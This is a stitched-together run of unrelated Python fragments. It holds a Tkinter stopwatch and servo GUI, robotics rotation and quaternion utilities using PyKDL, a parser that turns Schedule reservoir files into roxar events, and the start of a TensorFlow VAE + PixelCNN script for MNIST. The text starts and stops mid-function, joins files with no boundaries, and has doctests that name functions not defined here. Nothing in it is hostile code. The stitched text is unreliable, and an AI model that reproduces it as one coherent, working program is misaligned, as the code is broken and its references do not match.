else:
return False
def _OnValidate_iti(self, d, i, P, s, S, v, V, W):
"""This function checks if the input values into the spinboxes are valid"""
if S in '0123456789.':
try:
float(P)
return (float(P)>=iti_min) and (float(P)<=iti_max)
except ValueError:
return False
else:
return False
def _OnValidate_weight(self, d, i, P, s, S, v, V, W):
"""This function checks if the input values into the spinboxes are valid"""
if S in '0123456789.':
try:
float(P)
return (float(P)>=weight_min) and (float(P)<=weight_max)
except ValueError:
return False
else:
return False
def _OnValidate_speed(self, d, i, P, s, S, v, V, W):
"""This function checks if the input values into the spinboxes are valid"""
if S in '0123456789.':
try:
float(P)
return (float(P)>=speed_min) and (float(P)<=speed_max)
except ValueError:
return False
else:
return False
def _OnValidate_NoT(self, d, i, P, s, S, v, V, W):
"""This function checks if the input values into the spinboxes are valid"""
if S in '0123456789.':
try:
float(P)
return (float(P)>=NoT_min) and (float(P)<=NoT_max)
except ValueError:
return False
else:
return False
def _readline(self):
eol = b'\n'
leneol = len(eol)
line = bytearray()
while True:
c = ser.read(1)
if c:
line += c
if line[-leneol:] == eol:
break
else:
break
return bytes(line)
def makeWidgets(self):
""" Make the time label. """
self._setTime(self._elapsedtime)
def _update(self):
""" Update the label with elapsed time. """
self._elapsedtime = time.time() - self._start
self._setTime(self._elapsedtime)
self._timer = self.after(10, self._update)
seconds=self._elapsedtime
self.timed_control_new(seconds)
def _setTime(self, elap):
global timestr
timestr = StringVar()
global time_label
""" Set the time string to Minutes:Seconds:Hundreths """
minutes = int(elap/60)
seconds = int(elap - minutes*60.0)
hseconds = int((elap - minutes*60.0 - seconds)*100)
timestr.set('%02d:%02d:%02d' % (minutes, seconds, hseconds))
time_label.configure(textvariable=timestr)
def Start(self):
global running_var
global servo1_dir
""" Start the stopwatch, ignore if running. """
if not self._running:
self._start = time.time() - self._elapsedtime
self._update()
self._running = 1
running_var = 1
def Stop(self):
global running_var
global servoA_dir
global servoB_dir
global reset_var
reset_var = 0
""" Stop the stopwatch, ignore if stopped. """
if self._running:
self.after_cancel(self._timer)
self._elapsedtime = time.time() - self._start
self._setTime(self._elapsedtime)
self._running = 0
servoA_dir = 1
servoB_dir = 1
def Reset(self):
global running_var
global status_field
global servoA_dir
global servoB_dir
""" Reset the stopwatch. """
self._start = time.time()
self._elapsedtime = 0.0
self._setTime(self._elapsedtime)
status_field.config(text="... waiting",fg="black")
servoA_dir = 1
servoB_dir = 1
global curr_NoT
curr_NoT = 0
global lat_OFF_list
lat_OFF_list = []
global lat_ON_list
lat_ON_list = []
global trial_list
trial_list = []
trial_window.delete(1.0, END)
lat_OFF_window.delete(1.0, END)
lat_ON_window.delete(1.0, END)
global sides_list
sides_list = []
sides_window.delete(1.0, END)
global its_list
its_list = []
its_window.delete(1.0, END)
global its
its = 0
global start_t
start_t = 0.0
global stop_OFF_t
stop_OFF_t = 0.0
global stop_ON_t
stop_ON_t = 0.0
global last_t
last_t = 0.0
global lat_OFF
        lat_OFF = 0.0
""" This file defines general utility functions and classes. """
import math
import numpy as np
# import sys
#
# sys.path.append('/home/rkojcev/ros_python3/devel/lib')
import PyKDL as kdl
class BundleType():
"""
This class bundles many fields, similar to a record or a mutable
namedtuple.
"""
def __init__(self, variables):
for var, val in variables.items():
object.__setattr__(self, var, val)
# Freeze fields so new ones cannot be set.
def __setattr__(self, key, value):
if not hasattr(self, key):
raise AttributeError("%r has no attribute %s" % (self, key))
object.__setattr__(self, key, value)
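# Minimal usage sketch (not part of the original module); the field names and
# values below are arbitrary examples showing that BundleType allows updates to
# existing fields but rejects new ones.
def _exampleBundleType():
    bundle = BundleType({'x': 1, 'y': 2.0})
    bundle.x = 5                 # existing field: allowed
    try:
        bundle.z = 3             # unknown field: rejected by __setattr__
    except AttributeError:
        pass
    return bundle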
def checkShape(value, expectedShape, name=''):
"""
Throws a ValueError if value.shape != expectedShape.
Args:
value: Matrix to shape check.
expectedShape: A tuple or list of integers.
name: An optional name to add to the exception message.
"""
if value.shape != tuple(expectedShape):
raise ValueError('Shape mismatch %s: Expected %s, got %s' %
(name, str(expectedShape), str(value.shape)))
def finiteDifferences(func, inputs, funcOutputShape=(), epsilon=1e-5):
"""
Computes gradients via finite differences.
derivative = (func(x+epsilon) - func(x-epsilon)) / (2*epsilon)
Args:
func: Function to compute gradient of. Inputs and outputs can be
arbitrary dimension.
inputs: Vector value to compute gradient at.
funcOutputShape: Shape of the output of func. Default is
empty-tuple, which works for scalar-valued functions.
epsilon: Difference to use for computing gradient.
Returns:
Gradient vector of each dimension of func with respect to each
dimension of input.
"""
gradient = np.zeros(inputs.shape+funcOutputShape)
for idx, _ in np.ndenumerate(inputs):
testInput = np.copy(inputs)
testInput[idx] += epsilon
objD1 = func(testInput)
assert objD1.shape == funcOutputShape
testInput = np.copy(inputs)
testInput[idx] -= epsilon
objD2 = func(testInput)
assert objD2.shape == funcOutputShape
diff = (objD1 - objD2) / (2 * epsilon)
gradient[idx] += diff
return gradient
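# Minimal check sketch (not part of the original module): the numerical gradient of
# f(x) = sum(x**2) should agree with the analytic gradient 2*x; the test point and
# tolerance below are arbitrary assumptions.
def _exampleFiniteDifferences():
    x0 = np.array([1.0, -2.0, 0.5])
    grad = finiteDifferences(lambda x: np.sum(x ** 2), x0)
    assert approxEqual(grad, 2.0 * x0, threshold=1e-4)
    return grad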
def approxEqual(a01, b01, threshold=1e-5):
"""
Return whether two numbers are equal within an absolute threshold.
Returns:
True if a01 and b01 are equal within threshold.
"""
return np.all(np.abs(a01 - b01) < threshold)
def extractCondition(hyperparams, m01):
"""
Pull the relevant hyperparameters corresponding to the specified
condition, and return a new hyperparameter dictionary.
"""
return {var: val[m01] if isinstance(val, list) else val
for var, val in hyperparams.items()}
def getEePoints(offsets, eePos, eeRot):
"""
Helper method for computing the end effector points given a
position, rotation matrix, and offsets for each of the ee points.
Args:
offsets: N x 3 array where N is the number of points.
eePos: 1 x 3 array of the end effector position.
eeRot: 3 x 3 rotation matrix of the end effector.
Returns:
3 x N array of end effector points.
"""
return np.asarray(eeRot.dot(offsets.T) + eePos.T)
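# Minimal usage sketch (not part of the original module): with an identity rotation
# the result is simply the transposed offsets shifted by the end effector position;
# the offsets and position below are arbitrary examples.
def _exampleGetEePoints():
    offsets = np.array([[0.1, 0.0, 0.0], [0.0, 0.2, 0.0]])   # N x 3
    eePos = np.array([[1.0, 2.0, 3.0]])                      # 1 x 3 row vector
    points = getEePoints(offsets, eePos, np.eye(3))
    assert points.shape == (3, 2)
    return points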
def getPosition(tf1, target, source, time):
"""
Utility function that uses tf to return the position of target
relative to source at time
tf1: Object that implements TransformListener
target: Valid label corresponding to target link
source: Valid label corresponding to source link
time: Time given in TF's time structure of secs and nsecs
"""
# Calculate the quaternion data for the relative position
# between the target and source.
# translation, rot = tf1.lookupTransform(target, source, time)
position, _ = tf1.lookupTransform(source, target, time)
position = np.asarray(position)
return position
def getRotationMatrix(angle, direction, point=None):
"""Return matrix to rotate about axis defined by point and direction.
    >>> R = rotation_matrix(math.pi/2, [0, 0, 1], [1, 0, 0])
>>> np.allclose(np.dot(R, [0, 0, 0, 1]), [1, -1, 0, 1])
True
>>> angle = (random.random() - 0.5) * (2*math.pi)
>>> direc = np.random.random(3) - 0.5
>>> point = np.random.random(3) - 0.5
>>> R0 = rotation_matrix(angle, direc, point)
>>> R1 = rotation_matrix(angle-2*math.pi, direc, point)
>>> is_same_transform(R0, R1)
True
>>> R0 = rotation_matrix(angle, direc, point)
>>> R1 = rotation_matrix(-angle, -direc, point)
>>> is_same_transform(R0, R1)
True
>>> I = np.identity(4, np.float64)
>>> np.allclose(I, rotation_matrix(math.pi*2, direc))
True
>>> np.allclose(2, np.trace(rotation_matrix(math.pi/2,
... direc, point)))
True
"""
sina = math.sin(angle)
cosa = math.cos(angle)
# rotation matrix around unit vector
rot = np.diag([cosa, cosa, cosa])
rot += np.outer(direction, direction) * (1.0 - cosa)
direction *= sina
rot += np.array([[0.0, -direction[2], direction[1]],
[direction[2], 0.0, -direction[0]],
[-direction[1], direction[0], 0.0]])
matrix = np.identity(4)
matrix[:3, :3] = rot
if point is not None:
# rotation not around origin
point = np.array(point[:3], dtype=np.float64, copy=False)
matrix[:3, 3] = point - np.dot(rot, point)
return matrix
def rotationFromMatrix(matrix):
"""Return rotation angle and axis from rotation matrix.
>>> angle = (random.random() - 0.5) * (2*math.pi)
>>> direc = np.random.random(3) - 0.5
>>> point = np.random.random(3) - 0.5
>>> R0 = rotation_matrix(angle, direc, point)
>>> angle, direc, point = rotationFromMatrix(R0)
>>> R1 = rotation_matrix(angle, direc, point)
>>> is_same_transform(R0, R1)
True
"""
rot = np.array(matrix, dtype=np.float64, copy=False)
r33 = rot[:3, :3]
# direction: unit eigenvector of r33 corresponding to eigenvalue of 1
w00, w01 = np.linalg.eig(r33.T)
i = np.where(abs(np.real(w00) - 1.0) < 1e-8)[0]
    if not len(i):
raise ValueError("no unit eigenvector corresponding to eigenvalue 1")
direction = np.real(w01[:, i[-1]]).squeeze()
    # point: unit eigenvector of rot corresponding to eigenvalue of 1
w00, q00 = np.linalg.eig(rot)
i = np.where(abs(np.real(w00) - 1.0) < 1e-8)[0]
    if not len(i):
raise ValueError("no unit eigenvector corresponding to eigenvalue 1")
point = np.real(q00[:, i[-1]]).squeeze()
point /= point[3]
# rotation angle depending on direction
cosa = (np.trace(r33) - 1.0) / 2.0
if abs(direction[2]) > 1e-8:
sina = (rot[1, 0] + (cosa-1.0)*direction[0]*direction[1]) / direction[2]
elif abs(direction[1]) > 1e-8:
sina = (rot[0, 2] + (cosa-1.0)*direction[0]*direction[2]) / direction[1]
else:
sina = (rot[2, 1] + (cosa-1.0)*direction[1]*direction[2]) / direction[0]
angle = math.atan2(sina, cosa)
return angle, direction, point
def quaternionFromMatrix(matrix, isprecise=False):
"""Return quaternion from rotation matrix.
If isprecise is True, the input matrix is assumed to be a precise rotation
matrix and a faster algorithm is used.
>>> q00 = quaternionFromMatrix(np.identity(4), True)
    >>> np.allclose(q00, [1, 0, 0, 0])
True
>>> q00 = quaternionFromMatrix(np.diag([1, -1, -1, 1]))
    >>> np.allclose(q00, [0, 1, 0, 0]) or np.allclose(q00, [0, -1, 0, 0])
True
>>> R = rotation_matrix(0.123, (1, 2, 3))
>>> q00 = quaternionFromMatrix(R, True)
    >>> np.allclose(q00, [0.9981095, 0.0164262, 0.0328524, 0.0492786])
True
>>> R = [[-0.545, 0.797, 0.260, 0], [0.733, 0.603, -0.313, 0],
... [-0.407, 0.021, -0.913, 0], [0, 0, 0, 1]]
>>> q00 = quaternionFromMatrix(R)
    >>> np.allclose(q00, [0.19069, 0.43736, 0.87485, -0.083611])
True
>>> R = [[0.395, 0.362, 0.843, 0], [-0.626, 0.796, -0.056, 0],
... [-0.677, -0.498, 0.529, 0], [0, 0, 0, 1]]
>>> q00 = quaternionFromMatrix(R)
    >>> np.allclose(q00, [0.82336615, -0.13610694, 0.46344705, -0.29792603])
True
>>> R = random_rotation_matrix()
>>> q00 = quaternionFromMatrix(R)
    >>> is_same_transform(R, quaternion_matrix(q00))
True
>>> is_same_quaternion(quaternionFromMatrix(R, isprecise=False),
... quaternionFromMatrix(R, isprecise=True))
True
>>> R = euler_matrix(0.0, 0.0, np.pi/2.0)
>>> is_same_quaternion(quaternionFromMatrix(R, isprecise=False),
... quaternionFromMatrix(R, isprecise=True))
True
"""
matrix = np.array(matrix, dtype=np.float64, copy=False)[:4, :4]
if isprecise:
q00 = np.empty((4, ))
t00 = np.trace(matrix)
if t00 > matrix[3, 3]:
q00[0] = t00
q00[3] = matrix[1, 0] - matrix[0, 1]
q00[2] = matrix[0, 2] - matrix[2, 0]
q00[1] = matrix[2, 1] - matrix[1, 2]
else:
i, j, k = 0, 1, 2
if matrix[1, 1] > matrix[0, 0]:
i, j, k = 1, 2, 0
if matrix[2, 2] > matrix[i, i]:
i, j, k = 2, 0, 1
t00 = matrix[i, i] - (matrix[j, j] + matrix[k, k]) + matrix[3, 3]
q00[i] = t00
q00[j] = matrix[i, j] + matrix[j, i]
q00[k] = matrix[k, i] + matrix[i, k]
q00[3] = matrix[k, j] - matrix[j, k]
q00 = q00[[3, 0, 1, 2]]
q00 *= 0.5 / math.sqrt(t00 * matrix[3, 3])
else:
m00 = matrix[0, 0]
m01 = matrix[0, 1]
m02 = matrix[0, 2]
m10 = matrix[1, 0]
m11 = matrix[1, 1]
m12 = matrix[1, 2]
m20 = matrix[2, 0]
m21 = matrix[2, 1]
m22 = matrix[2, 2]
# symmetric matrix k00
k00 = np.array([[m00-m11-m22, 0.0, 0.0, 0.0],
[m01+m10, m11-m00-m22, 0.0, 0.0],
[m02+m20, m12+m21, m22-m00-m11, 0.0],
[m21-m12, m02-m20, m10-m01, m00+m11+m22]])
k00 /= 3.0
# quaternion is eigenvector of k00 that corresponds to largest eigenvalue
w00, v00 = np.linalg.eigh(k00)
q00 = v00[[3, 0, 1, 2], np.argmax(w00)]
if q00[0] < 0.0:
np.negative(q00, q00)
# exchange (w, x, y, z) to (x, y, z, w)
qNew = np.empty(4)
qNew[:3] = q00[1:]
qNew[3] = q00[0]
return qNew
def jointListToKdl(q00):
""" Return KDL JntArray converted from list q00 """
if q00 is None:
return None
if isinstance(q00, np.matrix) and q00.shape[1] == 0:
q00 = q00.T.tolist()[0]
    qKdl = kdl.JntArray(len(q00))
    for i, qI in enumerate(q00):
        qKdl[i] = qI
    return qKdl
"""Functions for reading Schedule input files: net, cnt, tub, ev
"""
from datetime import datetime
import roxar
import roxar.events
def _get_wellname(schedname):
"""Based on Schedule well name, including branch symbol, return well and wellbore names
"""
iloc = schedname.find('%')
if iloc > 0:
well_name = schedname[:iloc]
else:
well_name = schedname
return well_name
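# Minimal usage sketch (not part of the original module); the well names are
# arbitrary examples showing that the branch marker after '%' is stripped.
def _example_get_wellname():
    assert _get_wellname('A-1%MB1') == 'A-1'
    assert _get_wellname('A-1') == 'A-1'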
def _check_rest(datestr, symb):
"""Check if date contains mixed symbols like SOS + 1 MONTH
"""
rest = datestr.strip(symb)
rest = rest.strip()
if rest != '':
errmes = 'Error reading Schedule file. Cannot handle date string ' + datestr
raise ValueError(errmes)
return None
def _read_date(datestr, line_no, symbdate):
"""Read date from Schedule input files
"""
for key, value in symbdate.items():
estr = '\"' + key + '\"'
ix1 = datestr.find(estr)
if ix1 >= 0:
_check_rest(datestr, estr)
return value
estr = "\'" + key + "\'"
ix1 = datestr.find(estr)
if ix1 >= 0:
_check_rest(datestr, estr)
return value
ix1 = datestr.find(key)
if ix1 >= 0:
_check_rest(datestr, key)
return value
sepdef = (r'.', r'-', r'*', r'+', r':', r';', '\\', r'/')
dateok = False
for sep in sepdef:
ix1 = datestr.find(sep)
if ix1 >= 0:
terms = datestr.split(sep)
try:
day = int(terms[0])
month = int(terms[1])
year = int(terms[2])
dateok = True
break
except:
errmes = 'Cannot read date format: ' + datestr + ' found in line ' + str(line_no) + '.'
raise ValueError(errmes)
if not dateok:
ida = 0
imo = 3
iye = 6
try:
day = int(datestr[ida:ida+2])
month = int(datestr[imo:imo+2])
year = int(datestr[iye:iye+4])
except:
errmes = 'Cannot read date format: ' + datestr + ' found in line ' + str(line_no) + '.'
raise ValueError(errmes)
return datetime(year, month, day)
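# Minimal usage sketch (not part of the original module): both symbolic and numeric
# dates are handled; the symbol dictionary and date strings are arbitrary examples.
def _example_read_date():
    symbdate = {'SOS': datetime(2000, 1, 1)}
    assert _read_date('SOS', 1, symbdate) == datetime(2000, 1, 1)
    assert _read_date('1.7.2003', 2, symbdate) == datetime(2003, 7, 1)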
def _read_items(line, nitem, line_no):
"""Interpret data in line, including repeated counts
"""
nval = 0
line = line.replace(',', ' ')
terms = line.split()
qtxt = False
# First handle quotations
ite = []
for trm in terms:
if trm.startswith('/'):
break
elif trm.startswith("\'"):
if trm.endswith("\'"):
trm = trm.replace("\'", '')
ite.append(trm)
nval += 1
else:
txt = trm
qtxt = True
elif trm.startswith('\"'):
if trm.endswith('\"'):
trm = trm.replace('\"', '')
ite.append(trm)
nval += 1
else:
txt = trm
qtxt = True
elif qtxt:
txt = txt + trm
if txt.endswith("\'"):
txt = txt.replace("\'", '')
ite.append(txt)
nval += 1
qtxt = False
elif txt.endswith('\"'):
txt = txt.replace('\"', '')
ite.append(txt)
nval += 1
qtxt = False
else:
ite.append(trm)
# Handle repeated counts:
items = []
nval = 0
for trm in ite:
iloc = trm.find('*')
if iloc >= 0:
if trm == '*':
items.append(trm)
nval += 1
else:
scount = trm.replace('*', '')
try:
ncount = int(scount)
except ValueError as e:
errmes = 'Error reading Schedule file, line ' + str(line_no) + ': ' + trm
raise ValueError(errmes)
for itr in range(ncount):
items.append('*')
nval += 1
else:
items.append(trm)
nval += 1
if nval < nitem:
for itr in range(nval, nitem):
items.append('*')
return items
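# Minimal usage sketch (not part of the original module): quoted strings lose their
# quotes, a repeat count such as 3* expands to that many defaults, records shorter
# than nitem are padded, and everything after '/' is ignored; the record is made up.
def _example_read_items():
    items = _read_items("'WELL-1' 3* 250.0 /", 6, 1)
    assert items == ['WELL-1', '*', '*', '*', '250.0', '*']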
def _read_float(item, line_no):
val = None
if item != '*':
try:
val = float(item)
except ValueError:
errmes = (
'Failed to read float value in Schedule file, line '
+ str(line_no)
+ ': '
+ item)
raise ValueError(errmes)
return val
def _read_int(item, line_no):
val = None
if item != '*':
try:
val = int(item)
except ValueError:
errmes = (
'Failed to read integer value in Schedule file, line '
+ str(line_no)
+ ': '
+ item)
raise ValueError(errmes)
return val
def read_schedule_net(file_name, symbdate):
"""Read Schedule net file with well group definitions
Args:
file_name (str): File name for event file
symbdate (dictionary of datetime): Dates for symbolic dates, like SOS
"""
try:
pfil = open(file_name, 'r')
except OSError as e:
errmes = 'Error opening file ' + file_name + '\n' + str(e)
raise OSError(errmes)
event_date = symbdate['SOS']
elist = []
line_no = 0
while True:
try:
line = pfil.readline()
except IOError:
errmes = 'Error reading Schedule net file, line ' + str(line_no + 1)
raise IOError(errmes)
if not line:
break
line_no += 1
temp = line.strip()
ic2 = temp.find('*')
if temp == '':
pass # Skip blank lines
elif temp.startswith('--'):
pass # Skip comments starting with --
else:
terms = temp.split()
if terms[0] == '*DATE':
event_date = _read_date(terms[1], line_no, symbdate)
elif terms[0] == '*GROUPNODE':
is_leaf = False
elif terms[0] == '*LEAFNODE':
is_leaf = True
elif ic2 >= 0:
errstr = 'Unexpected keyword: ' + terms[0]
raise ValueError(errstr)
else:
trm0 = terms[0].strip("\'")
trm1 = terms[1].strip("\'")
eve = roxar.events.Event.create(roxar.EventType.GMEMBER, event_date, [trm1])
eve['MEMBER'] = trm0
elist.append(eve)
if is_leaf: #Default well info
eve = roxar.events.Event.create(roxar.EventType.WTYPE, event_date, [trm0])
eve['TYPE'] = 'Producer'
eve['PHASE'] = 'Oil'
elist.append(eve)
pfil.close()
return elist
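# Hedged usage sketch (illustrative only; the file names and dates are assumptions,
# and the roxar.events API must be available in the running RMS Python environment):
#
#   symbdate = {'SOS': datetime(2000, 1, 1), 'EOS': datetime(2030, 1, 1)}
#   group_events = read_schedule_net('schedule.net', symbdate)
#   well_events = read_schedule_ev('schedule.ev', symbdate)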
def read_schedule_ev(file_name, symbdate, trajectory_type='Drilled trajectory'):
"""Read Schedule event file
Args:
file_name (str): File name for event file
symbdate (dictionary of datetime): Dates for symbolic dates, like SOS
trajectory_type (str): RMS trajectory definition
"""
try:
pfil = open(file_name, 'r')
except OSError as e:
errmes = 'Error opening file ' + file_name + '\n' + str(e)
raise OSError(errmes)
event_date = symbdate['SOS']
elist = []
well_name = 'xxx'
wellbore_name = well_name
# unit = 'METRIC' Currently not used
line_no = 0
wperfno = dict()
is_wconhist = False
def_mdstart = 0.
def_mdend = 10000.
wells_def_mdstart = [] # List of wells with defaulted MDSTART
wells_def_mdend = []
while True:
try:
line = pfil.readline()
except IOError:
errmes = 'Error reading Schedule event file, line ' + str(line_no + 1)
raise IOError(errmes)
if not line:
break
line_no = line_no + 1
temp = line.strip()
utemp = temp.upper()
if temp == '':
pass # Skip blank lines
elif temp.startswith('--'):
pass # Skip comments starting with --
else:
terms = utemp.split()
no_terms = len(terms)
if terms[0] == 'WELLNAME':
terms = temp.split()
well_name = _get_wellname(terms[1])
wellbore_name = terms[1]
wperfno[wellbore_name] = 0
elif terms[0] == 'UNITS':
pass
# unit = terms[1] # Currently not used
elif no_terms > 1:
if no_terms > 2 and terms[2].find('(') >= 0:
id2 = 0
for i in range(2,no_terms):
if terms[i].find(')') >= 0:
id2 = i + 1
id3 = id2 + 1
id4 = id3 + 1
id5 = id4 + 1
id6 = id5 + 1
break
if id2 == 0:
errmes = 'Missing left bracket in line ' + str(line_no)
raise ValueError(errmes)
else:
id2 = 2
id3 = 3
id4 = 4
id5 = 5
id6 = 6
if is_wconhist:
is_wconhist = False
rdat = _read_items(temp, 9, line_no)
# is_open = rdat[0] # Currently not used
# rtype = rdat[1] # Currently not used
srateo = _read_float(rdat[2], line_no)
sratew = _read_float(rdat[3], line_no)
srateg = _read_float(rdat[4], line_no)
ivfp = _read_int(rdat[5], line_no)
alq = _read_float(rdat[6], line_no)
vthp = _read_float(rdat[7], line_no)
vbhp = _read_float(rdat[8], line_no)
if vthp is not None or vbhp is not None:
eve = roxar.events.Event.create(
roxar.EventType.WHISTPRES, event_date, [well_name])
if vthp is not None:
eve['THP'] = vthp
if vbhp is not None:
eve['BHP'] = vbhp
elist.append(eve)
if srateo is not None or sratew is not None or srateg is not None:
eve = roxar.events.Event.create(
roxar.EventType.WHISTRATE, event_date, [well_name])
if srateo is not None:
eve['SRATEO'] = srateo
if sratew is not None:
eve['SRATEW'] = sratew
if srateg is not None:
eve['SRATEG'] = srateg
elist.append(eve)
if ivfp is not None:
eve = roxar.events.Event.create(
roxar.EventType.WLIFTTABLE, event_date, [well_name])
eve['TABLEID'] = str(ivfp)
elist.append(eve)
if alq is not None:
eve = roxar.events.Event.create(
roxar.EventType.WLIFTGAS, event_date, [well_name])
eve['RATEG'] = alq
elist.append(eve)
elif terms[1] == 'PERFORATION':
event_date = _read_date(terms[0], line_no, symbdate)
traj_name = [well_name, wellbore_name, trajectory_type]
eve = roxar.events.Event.create(roxar.EventType.PERF, event_date, traj_name)
try:
if terms[id2] == '*':
eve['MDSTART'] = def_mdstart
wells_def_mdstart.append(wellbore_name)
else:
eve['MDSTART'] = float(terms[id2])
if terms[id3] == '*':
eve['MDEND'] = def_mdend
wells_def_mdend.append(wellbore_name)
else:
eve['MDEND'] = float(terms[id3])
if terms[id4] != '*':
eve['RADIUS'] = 0.5*float(terms[id4])
if terms[id5] != '*':
eve['SKIN'] = float(terms[id5])
eve['PERFID'] = chr(wperfno[wellbore_name] + ord('A'))
wperfno[wellbore_name] += 1
if no_terms > id6 and terms[id6].startswith('--'):
iloc = line.find('--')
com = line[iloc+2:]
com = com.lstrip()
com = com.strip('\n')
eve['COMMENT'] = com
except ValueError:
errstr = 'Failed to read PERFORATION data in line ' + str(line_no)
raise ValueError(errstr)
elist.append(eve)
elif terms[1] == 'BAREFOOT':
event_date = _read_date(terms[0], line_no, symbdate)
traj_name = [well_name, wellbore_name, trajectory_type]
eve = roxar.events.Event.create(roxar.EventType.PERF, event_date, traj_name)
| |
"""
Multilayer VAE + Pixel CNN
<NAME>
"""
import os, sys
if 'ISHAAN_NN_LIB' in os.environ:
sys.path.append(os.environ['ISHAAN_NN_LIB'])
else:
sys.path.append(os.getcwd())
N_GPUS = 1
try: # This only matters on Ishaan's computer
import experiment_tools
experiment_tools.wait_for_gpu(tf=True, n_gpus=N_GPUS)
except ImportError:
pass
import tflib as lib
import tflib.debug
import tflib.train_loop_2
import tflib.ops.kl_unit_gaussian
import tflib.ops.kl_gaussian_gaussian
import tflib.ops.conv2d
import tflib.ops.deconv2d
import tflib.ops.linear
import tflib.ops.batchnorm
import tflib.ops.embedding
from sklearn.svm import LinearSVC
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
# import tflib.lsun_bedrooms
import tflib.mnist_256
# import tflib.small_imagenet
# import tflib.svhn
# import knn
import sklearn.neighbors
import numpy as np
import tensorflow as tf
import scipy.misc
from scipy.misc import imsave
import time
import functools
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
# two_level uses Enc1/Dec1 for the bottom level, Enc2/Dec2 for the top level
# one_level uses EncFull/DecFull for the bottom (and only) level
MODE = 'one_level'
PIXEL_LEVEL_PIXCNN = True
LATENT_DIM_2 = 3
FEATURES = 'mu1'
PIXCNN_ONLY = False
EMBED_INPUTS = False
# These settings are good for a 'smaller' model that trains (up to 200K iters)
# in ~1 day on a GTX 1080 (probably equivalent to 2 K40s).
DIM_EMBED = 16
N = 1
DIM_PIX_1 = 32*N
DIM_1 = 32*N
DIM_2 = 64*N
DIM_3 = 128*N
DIM_4 = 256*N
ALPHA1_ITERS = 1000
# ALPHA2_ITERS = 5000
KL_PENALTY = 1.00
BETA_ITERS = 1000
# In Dec2, we break each spatial location into N blocks (analogous to channels
# in the original PixelCNN) and model each spatial location autoregressively
# as P(x)=P(x0)*P(x1|x0)*P(x2|x0,x1)... In my experiments values of N > 1
# actually hurt performance. Unsure why; might be a bug.
PIX_2_N_BLOCKS = 1
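# Illustrative note (added): with N blocks per location the per-location distribution
# factorizes autoregressively, e.g. for N = 3:
#   P(x) = P(x_0) * P(x_1 | x_0) * P(x_2 | x_0, x_1)
# With PIX_2_N_BLOCKS = 1 each spatial location is modelled as a single block.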
TIMES = {
'mode': 'iters',
'test_every': 1*1000,
'stop_after': 25*1000,
'callback_every': 1*1000
}
VANILLA = False
LR = 1e-3
LR_DECAY_AFTER = TIMES['stop_after']
LR_DECAY_FACTOR = 1.
BATCH_SIZE = 100
N_CHANNELS = 1
HEIGHT = 28
WIDTH = 28
train_data, dev_data, test_data = lib.mnist_256.load(BATCH_SIZE, BATCH_SIZE, True)
# train_data, test_data = lib.svhn.load(BATCH_SIZE)
lib.print_model_settings(locals().copy())
DEVICES = ['/gpu:{}'.format(i) for i in xrange(N_GPUS)]
lib.ops.conv2d.enable_default_weightnorm()
lib.ops.deconv2d.enable_default_weightnorm()
lib.ops.linear.enable_default_weightnorm()
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as session:
bn_is_training = tf.placeholder(tf.bool, shape=None, name='bn_is_training')
bn_stats_iter = tf.placeholder(tf.int32, shape=None, name='bn_stats_iter')
total_iters = tf.placeholder(tf.int32, shape=None, name='total_iters')
all_images = tf.placeholder(tf.int32, shape=[None, N_CHANNELS, HEIGHT, WIDTH], name='all_images')
all_labels = tf.placeholder(tf.int32, shape=[None], name='all_labels')
# all_labelled = tf.placeholder(tf.int32, shape=[None], name='all_labelled')
# all_latents1 = tf.placeholder(tf.float32, shape=[None, LATENT_DIM_1, LATENTS1_HEIGHT, LATENTS1_WIDTH], name='all_latents1')
split_images = tf.split(0, len(DEVICES), all_images)
split_labels = tf.split(0, len(DEVICES), all_labels)
# split_labelled = tf.split(0, len(DEVICES), all_labelled)
# split_latents1 = tf.split(0, len(DEVICES), all_latents1)
tower_cost = []
tower_outputs1_sample = []
for device_index, (device, images, labels) in enumerate(zip(DEVICES, split_images, split_labels)):
with tf.device(device):
def nonlinearity(x):
return tf.nn.elu(x)
def pixcnn_gated_nonlinearity(a, b):
# return tf.sigmoid(a) * b
return tf.sigmoid(a) * tf.tanh(b)
def SubpixelConv2D(*args, **kwargs):
kwargs['output_dim'] = 4*kwargs['output_dim']
output = lib.ops.conv2d.Conv2D(*args, **kwargs)
output = tf.transpose(output, [0,2,3,1])
output = tf.depth_to_space(output, 2)
output = tf.transpose(output, [0,3,1,2])
return output
def ResidualBlock(name, input_dim, output_dim, inputs, inputs_stdev, filter_size, mask_type=None, resample=None, he_init=True):
"""
resample: None, 'down', or 'up'
"""
if mask_type != None and resample != None:
raise Exception('Unsupported configuration')
if resample=='down':
conv_shortcut = functools.partial(lib.ops.conv2d.Conv2D, stride=2)
conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=input_dim)
conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=output_dim, stride=2)
elif resample=='up':
conv_shortcut = SubpixelConv2D
conv_1 = functools.partial(SubpixelConv2D, input_dim=input_dim, output_dim=output_dim)
conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=output_dim, output_dim=output_dim)
elif resample==None:
conv_shortcut = lib.ops.conv2d.Conv2D
conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=output_dim)
conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=output_dim, output_dim=output_dim)
else:
raise Exception('invalid resample value')
if output_dim==input_dim and resample==None:
shortcut = inputs # Identity skip-connection
else:
shortcut = conv_shortcut(name+'.Shortcut', input_dim=input_dim, output_dim=output_dim, filter_size=1, mask_type=mask_type, he_init=False, biases=True, inputs=inputs)
output = inputs
if mask_type == None:
output = nonlinearity(output)
output = conv_1(name+'.Conv1', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init, weightnorm=False)
output = nonlinearity(output)
output = conv_2(name+'.Conv2', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init, weightnorm=False, biases=False)
if device_index == 0:
output = lib.ops.batchnorm.Batchnorm(name+'.BN', [0,2,3], output, bn_is_training, bn_stats_iter)
else:
output = lib.ops.batchnorm.Batchnorm(name+'.BN', [0,2,3], output, bn_is_training, bn_stats_iter, update_moving_stats=False)
else:
output = nonlinearity(output)
output_a = conv_1(name+'.Conv1A', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init)
output_b = conv_1(name+'.Conv1B', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init)
